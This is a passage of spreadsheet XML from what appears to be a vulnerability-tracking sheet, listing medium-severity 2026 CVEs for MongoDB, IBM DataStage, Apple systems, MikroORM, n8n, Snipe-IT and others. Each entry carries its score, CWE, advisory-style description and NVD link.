      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr"/>
      <c r="Q917" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R917" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
      <c r="S917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82092</t>
        </is>
      </c>
      <c r="D918" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E918" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr"/>
      <c r="Q918" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="R918" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information due to an absolute-path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82092</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82100</t>
        </is>
      </c>
      <c r="D919" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E919" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr"/>
      <c r="Q919" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R919" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="S919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82100</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84487</t>
        </is>
      </c>
      <c r="D920" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E920" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F920" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr"/>
      <c r="Q920" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R920" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted file may result in disclosure of process memory.</t>
        </is>
      </c>
      <c r="S920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84487</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84519</t>
        </is>
      </c>
      <c r="D921" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E921" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F921" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr"/>
      <c r="Q921" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R921" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Mounting a disk image with maliciously crafted files may lead to unexpected system termination.</t>
        </is>
      </c>
      <c r="S921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84519</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84536</t>
        </is>
      </c>
      <c r="D922" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E922" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F922" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr"/>
      <c r="Q922" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R922" s="5" t="inlineStr">
        <is>
          <t>An integer underflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious SMB server may lead to unexpected system termination.</t>
        </is>
      </c>
      <c r="S922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84536</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84588</t>
        </is>
      </c>
      <c r="D923" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E923" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F923" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr"/>
      <c r="Q923" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R923" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in macOS Golden Gate 27. Mounting a maliciously crafted disk image may cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84588</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84596</t>
        </is>
      </c>
      <c r="D924" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E924" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F924" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr"/>
      <c r="Q924" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R924" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted font may result in the disclosure of process memory.</t>
        </is>
      </c>
      <c r="S924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84596</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84597</t>
        </is>
      </c>
      <c r="D925" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E925" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F925" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr"/>
      <c r="Q925" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R925" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read issue was addressed with improved input validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted font may result in the disclosure of process memory.</t>
        </is>
      </c>
      <c r="S925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84597</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84635</t>
        </is>
      </c>
      <c r="D926" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E926" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F926" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr"/>
      <c r="Q926" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R926" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved state management. This issue is fixed in Safari 27, iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. Processing maliciously crafted web content may lead to an unexpected process termination.</t>
        </is>
      </c>
      <c r="S926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84635</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84859</t>
        </is>
      </c>
      <c r="D927" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E927" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F927" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="inlineStr"/>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K927" s="5" t="inlineStr"/>
      <c r="L927" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr"/>
      <c r="Q927" s="5" t="inlineStr"/>
      <c r="R927" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authenticated Blind SQL Injection
The /api/events/search endpoint accepts a JSON body containing a sortBy array. The values in this array are concatenated directly into the SQL ORDER BY clause without any sanitization or parameterization. This allows authenticated users with the ROLE_USER role to perform time-based and boolean-based blind SQL injection to extract arbitrary data from the database, including password hashes of all users.
The endpoint is accessible to any authenticated user with ROLE_USER, ROLE_ADMIN, or ROLE_PUBLIC via POST /api/events/search as defined in spring-security.xml.</t>
        </is>
      </c>
      <c r="S927" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84859</t>
        </is>
      </c>
    </row>
    <row r="928">
      <c r="A928" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B928" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C928" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84993</t>
        </is>
      </c>
      <c r="D928" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E928" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F928" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G928" s="5" t="inlineStr"/>
      <c r="H928" s="5" t="inlineStr"/>
      <c r="I928" s="5" t="inlineStr"/>
      <c r="J928" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="K928" s="5" t="inlineStr"/>
      <c r="L928" s="5" t="inlineStr"/>
      <c r="M928" s="5" t="inlineStr"/>
      <c r="N928" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O928" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P928" s="5" t="inlineStr"/>
      <c r="Q928" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R928" s="5" t="inlineStr">
        <is>
          <t>MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to 6.6.16 and 7.1.7, the shared SQL layer validates the field key of an orderBy clause but does not validate its direction value before AbstractSqlPlatform.getOrderByExpression concatenates it into an ORDER BY clause. Applications that bind attacker-controlled request data to the direction in em.find(), em.findOne(), em.findAndCount(), QueryBuilder.orderBy(), or QueryBuilderHelper.getQueryOrderFromObject() can permit a raw SQL fragment that performs blind or boolean extraction of data available to the database account. The BaseMySqlPlatform and MsSqlPlatform fallthrough paths have the same behavior, affecting SQLite, PostgreSQL, MySQL, MariaDB, MSSQL, libSQL, and Oracle drivers, while MongoDB is not affected. This issue is fixed in versions 6.6.16 and 7.1.7.</t>
        </is>
      </c>
      <c r="S928" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84993</t>
        </is>
      </c>
    </row>
    <row r="929">
      <c r="A929" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B929" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C929" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85171</t>
        </is>
      </c>
      <c r="D929" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E929" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G929" s="5" t="inlineStr"/>
      <c r="H929" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I929" s="5" t="inlineStr"/>
      <c r="J929" s="5" t="inlineStr"/>
      <c r="K929" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L929" s="5" t="inlineStr"/>
      <c r="M929" s="5" t="inlineStr"/>
      <c r="N929" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O929" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P929" s="5" t="inlineStr"/>
      <c r="Q929" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="R929" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.73, 2.35.4, and 2.36.2 contains a credential exposure vulnerability in the Strapi, SeaTable, and Mailcheck nodes. These nodes send their decrypted credentials to the authentication endpoint via the raw legacy HTTP helper outside any error handling, causing the plaintext secret to be persisted in execution error data. Any authenticated user can read the plaintext secret from their own execution through the REST API, bypassing the blank-value redaction enforced by the credentials API.</t>
        </is>
      </c>
      <c r="S929" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85171</t>
        </is>
      </c>
    </row>
    <row r="930">
      <c r="A930" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B930" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C930" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86358</t>
        </is>
      </c>
      <c r="D930" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E930" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F930" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G930" s="5" t="inlineStr"/>
      <c r="H930" s="5" t="inlineStr"/>
      <c r="I930" s="5" t="inlineStr"/>
      <c r="J930" s="5" t="inlineStr"/>
      <c r="K930" s="5" t="inlineStr"/>
      <c r="L930" s="5" t="inlineStr"/>
      <c r="M930" s="5" t="inlineStr"/>
      <c r="N930" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr"/>
      <c r="Q930" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains a Stack-based Buffer Overflow vulnerability. An unauthenticated attacker with adjacent network access could potentially exploit this vulnerability, leading to Remote execution.</t>
        </is>
      </c>
      <c r="S930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86358</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86764</t>
        </is>
      </c>
      <c r="D931" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E931" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr"/>
      <c r="Q931" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT through 8.6.4 (fixed in 8.7.0) does not enforce the components.view permission on the authenticated endpoint GET /api/v1/hardware/&lt;asset-id&gt;/assigned/components. The endpoint authorizes only assets.view on the parent asset before returning linked component details; the components.view check is applied only to the response's available_actions.view flag and not to the returned data. As a result, an authenticated user holding only assets.view can enumerate component IDs, names, assigned quantities, and notes that are otherwise protected — the direct GET /api/v1/components/&lt;id&gt; endpoint correctly returns 403 Forbidden for such users.</t>
        </is>
      </c>
      <c r="S931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86764</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86882</t>
        </is>
      </c>
      <c r="D932" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E932" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F932" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr"/>
      <c r="Q932" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted image may lead to unexpected process termination.</t>
        </is>
      </c>
      <c r="S932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86882</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86885</t>
        </is>
      </c>
      <c r="D933" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E933" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F933" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr"/>
      <c r="K933" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
